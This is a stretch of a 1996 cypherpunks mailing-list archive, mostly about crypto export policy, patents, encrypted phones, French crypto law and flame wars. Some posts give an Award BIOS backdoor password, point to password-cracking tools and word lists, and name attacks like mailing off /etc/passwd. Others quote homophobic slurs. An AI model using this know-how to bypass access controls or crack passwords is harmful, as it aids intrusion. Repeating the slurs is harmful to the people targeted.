ftp://ftp.dcs.rhbnc.ac.uk/pub/Chris.Mitchell/istr_a2.ps,
ftp://ftp.cl.cam.ac.uk/users/rja14/euroclipper.ps.Z

France disallows *import* and use of crypto technology without a permit,
and Russia requires a permit for use also.

Patent considerations:

According to 35 U.S.C. 271 (a), "whoever makes, uses, offers to sell, sells
or imports ... infringes the patent."  In other words, you better ensure
that you *compile out* and patented algorithms unless you intend to license
them, even if the code is not executed.  In fact, if you are in the USA,
merely ftp'ing SSLeay into the USA is a breach of various patents. (Eric,
you might consider splitting it into two ftp archives, one for the USA and
an additional one for the rest of the world.)

References:

RSA:	http://www.rsa.com/
CYLINK:	http://www.cylink.com/products/security/
ASCOM:	http://www.ascom.ch/Web/systec
Safer:	ftp://ftp.isi.ee.ethz.ch/pub/simpl/

For more information:

http://cwis.kub.nl/~frw/people/koops/lawsurvy.htm - Crypto Law Survey

Credits:

Thanks to to Eric Young, Rich Salz, Donald Lewine, Holger Reif and Bruce
Schneier (author of Applied Cryptography), Peter Trei, Remo Tabanelli,
Ben Laurie, Ulf Moeller, Michael Taylor for their contributions.

------------------------------------------------------------
Clifford Heath                          cjh@osa.com.au
Open Software Associates Limited
29 Ringwood Street / P O Box 401        Phone +613 9871 1694
Ringwood  VIC  3134    AUSTRALIA        Fax   +613 9871 1711
------------------------------------------------------------
  Deploy Applications across the Internet and Intranets!
	 Visit our Web site at http://www.osa.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 21 Nov 1996 10:47:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: killfiling aga@dhp.com
Message-ID: <3.0b28.32.19961121105128.006fd704@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:45 AM 11/21/96 -0800, nobody@cypherpunks.ca (John Anonymous
MacDonald) wrote:
[discussing aga@dhp.com]
>I should'a kill-filed this sicko long ago.

Agreed. But if you (and other anonymous posters) are going to continue to
reply to him or other unproductive kooks, would you please put their
addresses somewhere in the headers of your messages (perhaps in the To: or
Cc: or Subject:) headers so that the rest of us who are using killfiles
won't have to read your replies? 


--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles@netbox.com         | 
http://www.io.com/~gbroiles | Export jobs, not crypto.
                            | 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Galt <jongalt@pinn.net>
Date: Thu, 21 Nov 1996 08:05:57 -0800 (PST)
To: shamrock@netcom.com
Subject: Re: Stewart Baker on new crypto rules
In-Reply-To: <199611210227.SAA11010@crypt.hfinney.com>
Message-ID: <MAPI.Id.0016.006f6e67616c74203030303730303037@MAPI.to.RFC822>
MIME-Version: 1.0
Content-Type: text/plain


> On Wed, 20 Nov 1996, Hal Finney wrote:
> 
> Just so we are all clear about what HP is up to: in August, 1996, I
> attended a presentation by HP's policy person. He was touting the
> anti-four horsemen properties of HP/TIS/unnamed other's "voluntary" "key
> recovery"  system. When I pointed out to him that voluntary GAK could not
> possibly defend against criminals using strong crypto, since such
> criminals are unlikely to register their keys with the "escrow" agency, he
> replied: 
> 
> "There are many 
> possible interpretations of the words 'voluntary' and 'mandatory'."
> 
> I am willing to testify to this under oath.
> 
> I don't know what dictionary HP is using. Orwell himself must have 
> written it.

Try Black's Law Dictionary, 6th Edition.  The IRS uses it all the time.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Janzen <janzen@idacom.hp.com>
Date: Thu, 21 Nov 1996 11:04:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Replying to noise
In-Reply-To: <199611211445.GAA13181@abraham.cs.berkeley.edu>
Message-ID: <9611211904.AA18392@sabel.idacom.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


An anonymous poster writes:
> On Thu, 21 Nov 1996, aga <aga@dhp.com> wrote: 
> [demented ravings deleted]
> I should'a kill-filed this sicko long ago.
>	 
> >From whence does such trash arise?
>  
> Oh me!!

Yes, that's exactly right.  See, many of us _have_ "kill-filed this sicko"
long ago -- but when you quote these rants in your post, with no subject
line, no "aga@" or "freedom-knights" or what have you in the header, we
get the dubious privilege of seeing them anyway, mail filters or no mail
filters.  If you must respond, perhaps next time you could snip out the
garbage first.


>Like the raving individuals one passes on the sidewalk, he is best
>ignored. Leave him for professional care.

This is good advice.  Please, remember it the next time you're tempted to
respond to such garbage.

If you want help in ignoring him/her/it, and are on a Unix system, I'd be
happy to send you some tips on how to get procmail running.  If you're
on a PC or Mac, I'm sure some knowledgeable c'punk can post similar
information about Eudora filters and the like.

Thanks.  Sorry, all, for sending this to the list, but of course there
was no way to reply directly to the poster.

MJ




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vince Callaway <vince@web.wa.net>
Date: Thu, 21 Nov 1996 12:03:23 -0800 (PST)
To: Alan Pugh <Alan.Pugh@MCI.Com>
Subject: Re: Patent Fight Could Add to Cost of Inter
In-Reply-To: <Chameleon.848574420.apugh@tx86-8>
Message-ID: <Pine.LNX.3.93.961121115723.11445B-100000@web.wa.net>
MIME-Version: 1.0
Content-Type: text/plain



> ``We believe it's important to draw a line in the sand and make 
> them prove infringement,'' said CompuServe spokeswoman Gail 
> Whitcomb. ``We think their claim is way too broad.'' 

This is quite a statement coming from a company that flexed its muscles on
the .GIF file spec. about 3 years ago.

If I remember right Compuserve caused some some major changes in RIP and
HTTP developement.  Until that time the only graphic format supported in
Mosaic was .GIF.  JPEG was promptly added and there was hot debate about
the issue.

Did not slow down the net much though.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Thu, 21 Nov 1996 10:11:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Finjan "SurfinGate"
Message-ID: <32949B2B.5217@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Check out http://www.finjan.com and the stuff about "SurfinGate".  The
software supposedly can perform an on-the-fly inspection of a Java 
applet or ActiveX control, and then apply a signature to it along with
a "safety" level qualifier to feed into a configurable policy mechanism.

Any ideas as to how you can look at an ActiveX control and determine
whether it's safe or not?
-- 
______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Thu, 21 Nov 1996 12:20:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Digital Footprints (Article in UK Guardian)
Message-ID: <3294B96C.7C24@apple.com>
MIME-Version: 1.0
Content-Type: text/plain


The online edition of the UK Guardian newspaper has a long
article on the way that "Internet users leave traces and records
of every online action, from sending e-mail or posting to
newsgroups to visiting Web sites."

... "At the moment unwanted e-mail is about the limit of the
intrusion, but this could change. Internet commentator Dominique
Paul Noth points out: "You have no guarantee that the information is
intelligently or even accurately employed to your benefit." As more
information is collected, it is more useful to those collecting it
- and less easily controlled."

... One alternative is making yourself anonymous by deleting cookie
files and using mail programs that disguise your identity."

"However, making yourself anonymous online means that you cannot
personalise Web pages, ask for information via e-mail, or join
mailing lists. The issue, as Noth and other commentators recognise,
is more to do with how this information is used. Credit card companies
know what we are buying, and there is a legal framework to control
their use of this information. There is no such framework in force
for online information. 

"It seems that the very lack of "real world" controls over online
activity which many Internet users favour has created the environment
in which marketing companies can thrive. As long as the Internet
is seen as somehow outside the reach of the law, then there will be
those who abuse its freedom. So as you surf for Christmas presents,
look out for surprises in your mailbox as a result"

The full article is at:

http://go2.guardian.co.uk/internet/961121wwonDigitlafootprint.html
(Note that newspaper articles on the Web are often only visible
for a short time.)

Martin Minow
minow@apple.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kamil Golombek <Zero@mrkev.vabo.cz>
Date: Thu, 21 Nov 1996 03:39:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Magic passwodr in BIOS?
Message-ID: <32943F5D.DA2@mrkev.vabo.cz>
MIME-Version: 1.0
Content-Type: text/plain


Hi,
	yesterday I've read about so called "magic password" in AWARD BIOS. It
was a surprise for me and I wasn't very happy that the way how to bypass
this is so easy. But nevermind, I heve two questions about it. 	First,
is there any way how to disabled "magic password" 589589 in AWARD BIOS?
	Second, does anobody know another "magic passwords" to various BIOSes? 

		Thanks for your answers!
				ZERO




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kb4vwa@juno.com (Edward R. Figueroa)
Date: Thu, 21 Nov 1996 10:37:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Word Lists
Message-ID: <19961121.134031.7791.4.kb4vwa@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm looking for a Large Word List, for a pkcrack program.

Anyone have any idea where to find one, or how to convert a dictionary
formated file to a wordlist file?

Ed




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Fri, 22 Nov 1996 12:41:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Another animal isolation idea ...
Message-ID: <199611212223.OAA07413@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


How about putting the list o' bad animals in a separate list where the
list server will specially recognize and will not broadcast messages
except back to the sender?

This will be an effective stealth censorship mechanism, which some of
us would like to see happen to the few "animals" contributing the
trash.

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Thu, 21 Nov 1996 12:59:51 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: Finjan "SurfinGate"
In-Reply-To: <199611212036.PAA04813@homeport.org>
Message-ID: <3294C256.6B88@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:
> 
>         Does it access a file?  ...

Maybe I should have been more clear.

It's certainly true that one could concoct software that looked for
some tell-tale signs in Java applets or ActiveX controls (though it'd
be a little tricker in the latter case, I suspect).  What worries me
is that this sort of tool might provide a false sense of security to
corporate IS types (people who pay my company lots of money).

(Oh, gee, I see now that the last line of your message was "It could
lead to a false sense of security."  Rare concensus on cypherpunks.)

Anyway, there are lots of products like this (lots of virus scanners
claim to defend against "all current and future viruses"), and they're
not quite the same as sleazy snake-oil pseudo-crypto outfits.  It
worries me, if only as somebody with money in a bank that might be
rendered vulnerable, that a tool like this might be installed under
the illusion that an impenetrable wall has gone up around the 
network.

Seems to me that putting together an ActiveX control that "sneaks" its
way through the firewall risk policy wouldn't be hard.  Unless the 
applet scanner actually simulates execution of the control under a
variety of input conditions (and we know that's not likely) (but prove
me wrong, please) there's not much it can do other than poke around and
check what other DLL's the thing wants to access.  It might be a bit
harder to be sneaky in Java, but I certainly wouldn't bet I could look
at an applet and guarantee its safety to any threshold (if I could, why
not just do that in the browser?).

Believing in the safety of precertified applets/controls is scary 
enough.  Trusting yet another piece of software in the loop just seems
a little wacky to me.


(Oh, and in case Finjan is a Tivoli partner, or for all I know another
IBM company, I'm not speaking for Tivoli.)
-- 
______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lyal collins <lyalc@cba.com.au>
Date: Wed, 20 Nov 1996 20:11:34 -0800 (PST)
To: Roderick Simpson <rod@wired.com>
Subject: Re: Anon
In-Reply-To: <v02140b03aeb905639c67@[204.62.132.248]>
Message-ID: <3293E365.59DE@mail.cba.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Roderick Simpson wrote:
> 
> Who has made the strongest case _against_ anonymity on the Net that you
> have ever heard? Someone intelligent and theoretical rather than trapped in
> some child porn or commerce pov.

I don't know - they didn't give a name.
Lyal

> 
> Thanks,
> Rod
> 
> R o d e r i c k S i m p s o n                                rod@wired.com
> A s s o c i a t e P r o d u c e r  T h e H o t W i r e d N e t w o r k
> www.braintennis.com                            www.wiredsource.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Thu, 21 Nov 1996 15:11:15 -0800 (PST)
To: Firebeard <stend@grendel.texas.net>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611212309.PAB01049@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


Firebeard (ouch!) writes:
> >>>>> Dave Hayes writes:
> >> Yes, ownership gives you a license to censor. I'm going to have a
> >> party in my home a few weeks from now. If I don't like what someone
> >> is doing, I'll kick 'em out. I won't do it lightly, but I will
> >> fight for my right to do so.
> DH> Of course, you may invite anyone you choose, since a party is
> DH> usually had by inviting people whom you select. If you invite them
> DH> and then subsequently kick them out when they do things you do not
> DH> want them to do, I will chastise -you- (if I am present) for your
> DH> lack of judgement in whom to invite. Their behavior would merely
> DH> something to learn from, yours would be fashionably dishonorable.
> 	By "kicking them out", I'd be admitting that my judgement was
> in error.  I'm big enough to admit that.  

But are you "big" (by whatever standard) enough to admit that
"judgement" of others is the error?

> Apparently, you are not big enough to admit such a thing, and would
> prefer to cower in the corner while the person whose character you
> misjudged drives everyone else away.

Why go that far? 

The people *I* generally invite to parties are quite capable of
handling whatever disturbance arises, being "big enough" to realize
that "disruptive influences" are only disruptive if one allows them
that ability.

If I've invited someone who cannot handle their own ability to be
disrupted, only -then- is my judgement in "error" by the standard
of "error" you seem to be espousing. 

> DH> BTW, "Kicking them out" is not censorship. A party and a mailing
> DH> list are usually two different things. The former may include the
> DH> latter, but the latter is not anything like the former.
> >> Oh, and I plan to subscribe to the freedom-knights mailing list and
> >> infest it the way Vulis did cypherpunks. Every hour, on the hour, a
> >> crontab script will flood it with rants about Dave (fart) Hayes.
> DH> You won't do this, because I won't let you on the list. I, unlike
> DH> you or Mr. Gilmore, have the judgement on whom to invite to my
> DH> list.
> 	And Mr Gilmore may not have had the proper judgement, in
> allowing everyone to join the list.  

"Proper" in the sense you seem to mean it, implies that you understand
the goal Mr. Gilmore had in mind in allowing everyone to join the
list.

> But he was big enough to admit that he had made an error in
> judgement, and take steps to deal with that error, rather than deny
> that he had made the error.  Perhaps his judgement was in error
> regarding the steps he took, but I expect that if he reaches the
> conclusion that he was again in error, he will admit that.  Perhaps
> that judgement of mine is in error, but I'm big enough to admit that
> I'm not perfect.

Well. -I-, on the other hand, am so big that I have no need to
copiously announce the obvious fact of my imperfection to the world,
so I can afford to pretend that I am perfect.
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

A passerby caught Nasrudin prying open the window of his own bedroom from 
the outside in the depths of night. "What are you doing? Locked out?"
"Hush!" came the reply. "They say I walk in my sleep. I am trying to surprise
myself and find out."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Thu, 21 Nov 1996 12:10:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: <sigh> children
In-Reply-To: <199611211445.GAA13181@abraham.cs.berkeley.edu>
Message-ID: <199611212126.PAA31277@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Thu, 21 Nov 1996, aga <aga@dhp.com> wrote: 

>From: aga <aga@dhp.com>
>To: Rabid Wombat <wombat@mcfeely.bsfs.org>
>cc: FREEDOM-KNIGHTS@JETCAFE.ORG, Black Unicorn <unicorn@schloss.li>,
>        cypherpunks@toad.com
>Subject: Re: Does John Gilmore EAT Asshole?


>FUCK YOU COCKSUCKER -- as long as you keep writing to be,
>I will continue to rip a new asshole in the Faggot John Gilmore who
>promotes PUNKs like you.

>[snip]

>A 'punk' is a faggot pussy who is really NOT a man!

>The faggot Gilmore does take it up the ass and also eat assholes, so he
>should be added to the net.scum list at once.


<sigh> Parents you should really lock up you computers when your childern
are home alone.

-- 
-----------------------------------------------------------
"William H. Geiger III" <whgiii@amaranth.com>
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 21 Nov 1996 12:40:13 -0800 (PST)
To: m5@tivoli.com
Subject: Re: Finjan "SurfinGate"
In-Reply-To: <32949B2B.5217@tivoli.com>
Message-ID: <199611212036.PAA04813@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


	These thoughts are generic, and I haven't even looked at the
surfgate web page.

	Does it access a file?  winsock?  hard coded memory addresses?
Does it modify itself (Its code sections)?  What system calls does it
make?  Are they all on the thought safe list?

	If it does not, then you have a first level analysis and can
say that it might not be unsafe; you're a *LOT* better off than you
were before.

	Trying to prove the code is safe is hard.  Looking for obvious
attacks (java that writes .rhosts, mails off /etc/passwd) is not very
hard.   It can lead to a false sense of security.


Adam


Mike McNally wrote:
| Check out http://www.finjan.com and the stuff about "SurfinGate".  The
| software supposedly can perform an on-the-fly inspection of a Java 
| applet or ActiveX control, and then apply a signature to it along with
| a "safety" level qualifier to feed into a configurable policy mechanism.
| 
| Any ideas as to how you can look at an ActiveX control and determine
| whether it's safe or not?
| -- 
| ______c_________________________________________________________________
| Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
| mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
| http://www.io.com/~m101/                 * processing" are different!
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 21 Nov 1996 12:45:09 -0800 (PST)
To: Jon Galt <jongalt@pinn.net>
Subject: Re: Stewart Baker on new crypto rules
In-Reply-To: <MAPI.Id.0016.006f6e67616c74203030303730303037@MAPI.to.RFC822>
Message-ID: <Pine.SUN.3.94.961121154258.15840I-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Nov 1996, Jon Galt wrote:

> Date: Thu, 21 Nov 96 11:02:30 EST
> From: Jon Galt <jongalt@pinn.net>
> To: shamrock@netcom.com
> Cc: cypherpunks@toad.com, froomkin@law.miami.edu
> Subject: Re: Stewart Baker on new crypto rules
> 
> > On Wed, 20 Nov 1996, Hal Finney wrote:
> > 
> > Just so we are all clear about what HP is up to: in August, 1996, I
> > attended a presentation by HP's policy person. He was touting the
> > anti-four horsemen properties of HP/TIS/unnamed other's "voluntary" "key
> > recovery"  system. When I pointed out to him that voluntary GAK could not
> > possibly defend against criminals using strong crypto, since such
> > criminals are unlikely to register their keys with the "escrow" agency, he
> > replied: 
> > 
> > "There are many 
> > possible interpretations of the words 'voluntary' and 'mandatory'."
> > 
> > I am willing to testify to this under oath.
> > 
> > I don't know what dictionary HP is using. Orwell himself must have 
> > written it.
> 
> Try Black's Law Dictionary, 6th Edition.  The IRS uses it all the time.

Or my favorate supreme court quote:

Threat of loss, not hope of gain, is the essence of coercion.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Thu, 21 Nov 1996 12:50:31 -0800 (PST)
To: "Clay Olbon II" <clay.olbon@dynetics.com>
Subject: RE: Mass-market crypto phones
Message-ID: <n1363530815.90062@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


_______________________________________________________________________________
From: Clay Olbon II on Thu, Nov 21, 1996 15:20

>A while back, Eric Blossom posted a URL for a mass-market, phone encyrption
>device (http://www.comsec.com/).  The point of this post is to posit a

The above mentioned crypto phone was incredibly expensive, if I remember
correctly.  What it basically was (Please keep in mind I may be thinking
of a different product) a box containing a modem and a crypto-crunching
CPU.  Phone in one end, processed by said CPU, and send out other end.  I
have/had a similar idea, but I want to try make it a totally software 
product (assuming you have the necessary hw requirements on your computer)
where you talk in through a microphone (can something be wired so you can
use a regular phone plugged into your computer/modem/soundcard???) your
CPU crunches code, and spits out the encrypted data.  Obviously, the
complementing steps would be done on the receiving end.  
Has anyone ever tried anything like this?  

>I think we need to keep a couple of goals in mind.  The first, is to get
>encrypting phones (or phone add-ons) into Wal-mart, K-mart, etc (where
>probably most Americans now buy their phones).  The prices need to be low
>enough that people will want to buy them (<$100?).  Is this technically
>feasible?  The comsec device from the above URL already demonstrates the
>needed capability.  Is the cost target possible?  My guess is soon, given
>the lowering costs and increasing capabilities of current processors.

Goals sound good.  I feel it *definately* has to be below $100.  Personally,
I use a phone bought at K-Mart that cost $12 _after_ tax...  I wouldn't 
mind paying $50 for a techno gizmo that made my conversations, inane as they
may be, private.  The price would also have to be low to assure the other
end has a similar techno-gizmo, or I would have wasted my money.  Anyone
else see the *immediate* need for a standard?

>The second goal needs to be to push a similar product for cell-phones. 

If I'm not mistaken (and I've been known to be from time to time :-), cell
phones are already encrypted between the phone and cell tower.  That way,
they are no less private than a regular phone.  Of course, you may be
referring to further end-to-end encryption built into the phone in addition
to this, but as far as they being less secure than a house phone, I'm not
sure about that one.

>Given that these goals are met, I think widespread use of crypto over phone
>lines would become almost inevitable.  However, the fun part would be the
>introduction of such products.  The FUD coming from police, the government,
>etc. would be amazing to behold.

Agreed! 

>        Clay

>*******************************************************
>Clay Olbon			    olbon@ix.netcom.com
>engineer, programmer, statistitian, etc.
>**********************************************tanstaafl

PM

USER ERROR:  REPLACE AND STRIKE ANY KEY WHEN READY




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen, Patrick" <MullenP@ndhm06.ndhm.gtegsc.com>
Date: Thu, 21 Nov 1996 13:44:29 -0800 (PST)
To: "'kb4vwa@juno.com>
Subject: RE: Word List
Message-ID: <c=US%a=_%p=GTE%l=NDHM06-961121214346Z-21000@ndhm06.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


Note: I changed the list to Cypherpunks, since this is more relative to
that list.

Crack, the UN*X /etc/passwd cracker comes with a very large dictionary.
I
assume you want one for the same purpose (maybe not...).  I can't
remember
for sure, but I believe it is a plain ASCII file.  Go to webcrawler and
request
"crack and unix" (w/out quotes) and you'll find a listing.  A site named
/.hAcKiNg./ or something like that will show up.  It has Crack in pkzip
format.

BTW, this is a DOS application, *not* UN*X...

~ Patrick

>----------
>From: 	kb4vwa@juno.com[SMTP:kb4vwa@juno.com]
>
>I'm looking for a Large Word List.
>
>Anyone have any idea where to find one, or how to convert a dictionary
>formatted file to a wordlist file?
>
>Ed
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Thu, 21 Nov 1996 16:44:03 -0800 (PST)
To: vince@web.wa.net
Subject: RE: Patent Fight Could Add to Cost of Inter
Message-ID: <19961122004319974.AAA195@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


Unisys owns the patent for LZW compression which GIF (and TIFF and many other programs) utilizes. Unisys is the company that put pressure on CIS because CIS had developed the GIF format. 

CIS did nothing other than ruffle many peoples feathers and inspire the PNG team to create a new spec. JPEG support was inevitable across the board.

If I remember correctly the LZW patent expires next year.

The interesting patent I'm waiting to bubble to the top of pond is the one that covers the display of advertising material in a software program. I'm not making that up!

>Vince Callaway (vince@web.wa.net) said something about Re: Patent Fight Could Add to Cost of Inter  on or about 11/21/96 2:32 PM

>
>> ``We believe it's important to draw a line in the sand and make 
>> them prove infringement,'' said CompuServe spokeswoman Gail 
>> Whitcomb. ``We think their claim is way too broad.'' 
>
>This is quite a statement coming from a company that flexed its muscles on
>the .GIF file spec. about 3 years ago.
>
>If I remember right Compuserve caused some some major changes in RIP and
>HTTP developement.  Until that time the only graphic format supported in
>Mosaic was .GIF.  JPEG was promptly added and there was hot debate about
>the issue.
>
>Did not slow down the net much though.
>
>End of message

--j
-----------------------------------
| John Fricker (jfricker@vertexgroup.com)
| -random notes-
| My PGP public key is available by sending me mail with subject "send pgp key".
| www.Program.com is a good programmer web site.
-----------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Hennes <aie-rd@pobox.oleane.com>
Date: Thu, 21 Nov 1996 07:45:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cryptography in France
Message-ID: <3294796D.1543@pobox.oleane.com>
MIME-Version: 1.0
Content-Type: text/plain


This is my first post to the cypherpunks mailing list. I've been
monitoring it for a little while now, and I would like to initiate a
thread on the sorry state of public crypto in France, and would much
much appreciate feedback, comments and thoughts on the following.

It is no secret that public crypto here in France is a fucking joke. For
those of you who aren't up-to-date with French gov't policy on the
subject, let me state the simple: Public use of crypto (and esp. STRONG
crypto) is *outlawed* in France. This mere fact gives us (the French)
the dubious achievement of being rated along with the likes of China,
Iran, Iraq and former USSR, to name a few.

Now remember, this comes from a country that labels itself as the "Home
country of the Human Rights", yet denies its citizen access to the
technical means of ensuring REAL privacy. 

A much-needed privacy, considering the phone-tapping scandal that rocked
France two or three years back (then-prez Miterrand himself had ordered
that a whole bunch of people --novelists, journalists, politicians,
artists and various other intellectuals-- have their phone tapped and
their conversations recorded, without any legal permission to do so.
Even an uncle of mine was placed on such a list.).

I _do_ believe that a strong case --legally, economically and
philosophically-- could be made for the legalization of strong public
crypto in France. And I am also confident that we are moving toward a de
facto use of strong crypto in everyday life.

There are several legal points that could force the French gov't to give
some slack on crypto regulation. The first one is, of course, the
process of building Europe (I am not so naive as to believe this will be
a success, but it WILL provide us with some legal power to wield). Of
all nations being part of the EEC, France is the only one that enforces
such restrictions on public crypto. But, and this is my point, French
gov't has made a big fuss about standardization of regulation throughout
EEC and its participants, and when it comes to crypto, I believe they've
put their foot in their mouth!! ;-)

Second legal point: arguing the moral point of freedom of guaranteed
privacy. Outlawing public crypto *might* be unconstitutional,
considering that the French constitutions have always been built around
the anarchists revolutionaries of 1789 declaration of human rights. The
gov't will counter with 'Raison d'Etat' and need for terrorist
surveillance, but this is the same as saying weapon sales should be
prohibited to keep thugs away from weapons. Thugs *always* manage to get
weapons, and terrorists *always* manage to escape surveillance and plant
bombs in our streets and metro system.

Economically, the case could be made for public crypto by underlining
the importance of internet economics. It is a stated and definitive fact
that e-cash cannot exist without cryptographic means. Now if the general
public hasn't got access to strong crypto, why would they risk dealing
in e-cash??? Thus France would be left out of an immense -and as of now
virgin- commercial market, which in the near future would mean
commercial death. And that's not counting all the employement
opportunities that would be, one can speculate, created by the
flourishing of web commercial ventures. Ironically, Netscape has been
granted by the French gov't an 'extraordinary' license to use
cryptography in their Navigator software (even though it's the lame,
40-bit export key size). Which means that, as of now, the one and only
company that WOULD technically allow French citizens to engage in
electronic commerce is a foreign company... So on one hand we have the
French gov't making a huge fuss about 'Cultural Exception' when the
subject at hand is protecting the French TV and movie business --which
nobody actually gives a damn about--, and on the other hand, the very
same gov't not only regulates against strong public crypto, but when it
finally gives in a little, it's to the profit of a foreign company..
Next thing you know, France is going to equip all its phones with the
Clipper chip so that the NSA can listen in on, say, Airbus trade
secrets.. Can you get any dumber than this? The last economically sound
point relates to competition. By forbidding strong public crypto, France
has seriously hampered the ability of French cryptologists to move
forward technically, since they receive much less feedback than, say,
their scandinavian or US counterparts. And I believe that, in the long
term, strong public crypto WILL prevail --I AM optimistic (or is that
naive?). So all the French gov't is doing here is denying would-be
French companies to deal competitively in the crypto market, which I am
sure will explode with the coming of electronic commerce.

My last arguments are of the philosophical/moral/political order.
Politics in France have reached an all-time low at the end of 14 years
of Socialism (some may disagree on this, but this is MY belief).
Corruption is now widespread, at every levels of the public
administration, and at all 'rays' of the political spectrum. Politicians
now have more privileges than the royalty used to have just before the
revolution of 1789, when the laws and budgets were more deftly
controlled by house representatives than they are nowadays. Politicians
nowadays live as a microcosm, in an enclosed glasscase, protecting each
other regardless of ideology or political faith. They act as
superior-class citizens where they were meant to be representative of
the people, the citizens that mandated them as such. So I believe that
strong crypto is not only a right, but a mean that every citizen should
use against the preponderance of such a privileged class, in order to
make the French motto 'Liberte Egalite Fraternite' something else than
an obsolete joke. 

I'm not an anarchist, nor am I illuminated. I'm a regular guy with a
regular job. I'm simply tired of all these self-proclaimed important
people that live in the fast lane with MY taxes. And crypto would be a
mean for me to combat them more efficiently and to bring back some of
that much-needed social equilibrium. And, the hell with it, I want
GUARANTEED PRIVACY.

On Monday 18 Nov. Greg Broiles wrote:

>ICF is "International Cryptography Framework". 
>
>The press release includes quotes from US and >>French<< government officials
>indicating that the new system will meet their needs.

Man, this spells T-R-O-U-B-L-E ... ;-)

Thomas Hennes
aie-rd@pobox.oleane.com

PS: I would've loved to CC this thing to Chirac or PM Juppé, but neither
of them have actual e-mails, which tells you a lot about the interest
they have in net-business...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Wed, 20 Nov 1996 20:49:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: FUCK YOU punk/was:Taking out the garbage
In-Reply-To: <Pine.LNX.3.95.961120050108.20078A-100000@dhp.com>
Message-ID: <199611210407.RAA06841@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Nov 1996 05:11:47 -0500 (EST), aga <aga@dhp.com> wrote:

   On Tue, 19 Nov 1996, Dr.Dimitri Vulis KOTM wrote:
   >
   > Beginning Monday, 11/25/96, I will bounce all email from the various 
   > (non-)subscribers polluting this list with garbage back to the 
   > authors. Furthermore, I will attach documents describing basic 
   > Internet rules of conduct to each bounce.
   > 

First of all, it wasn't Vulis who wrote that, it was Lucky Green.  Try
to keep your attributions straight.

   Somebody tell this stupid motherfucker that there are NO "basic
